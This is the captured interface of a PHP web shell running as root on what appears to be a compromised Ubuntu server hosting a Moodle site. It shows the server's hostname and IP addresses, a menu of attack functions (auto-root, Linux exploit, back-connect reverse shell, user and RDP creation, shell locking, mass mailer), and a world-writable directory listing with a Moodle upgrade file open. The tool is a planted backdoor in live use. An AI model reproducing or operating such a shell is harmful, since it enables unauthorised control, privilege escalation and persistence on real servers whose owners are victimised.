Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
admin /
tool /
[ HOME SHELL ]
Name
Size
Permission
Action
assignmentupgrade
[ DIR ]
drwxrwxrwx
behat
[ DIR ]
drwxrwxrwx
capability
[ DIR ]
drwxrwxrwx
customlang
[ DIR ]
drwxrwxrwx
dbtransfer
[ DIR ]
drwxrwxrwx
generator
[ DIR ]
drwxrwxrwx
health
[ DIR ]
drwxrwxrwx
innodb
[ DIR ]
drwxrwxrwx
installaddon
[ DIR ]
drwxrwxrwx
langimport
[ DIR ]
drwxrwxrwx
multilangupgrade
[ DIR ]
drwxrwxrwx
phpunit
[ DIR ]
drwxrwxrwx
profiling
[ DIR ]
drwxrwxrwx
qeupgradehelper
[ DIR ]
drwxrwxrwx
replace
[ DIR ]
drwxrwxrwx
spamcleaner
[ DIR ]
drwxrwxrwx
timezoneimport
[ DIR ]
drwxrwxrwx
unsuproles
[ DIR ]
drwxrwxrwx
uploaduser
[ DIR ]
drwxrwxrwx
xmldb
[ DIR ]
drwxrwxrwx
upgrade.txt
872
B
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : upgrade.txt
This files describes API changes in /admin/tool/* - plugins, information provided here is intended especially for developers. === 2.2 === API changes: * new admin tool plugin type introduced How to migrate existing admin reports: # move all files to new /admin/tool/yourplugin/ location # update all links to admin tools /$CFG->admin/report/ to /$CFG->admin/tool/ # add language pack with at least 'pluginname' string # update all language strings (use 'tool_yourplugin' instead of 'report_yourplugin') - use AMOS hints in commit message # update all capability names # create db/install.php migration script - delete old settings and capabilities (see converted plugins for examples) # grep the plugin codebase and look for any remaining 'coursereport' occurrences # update CSS selectors See http://docs.moodle.org/dev/Admin_tools for more details and explanation.
Close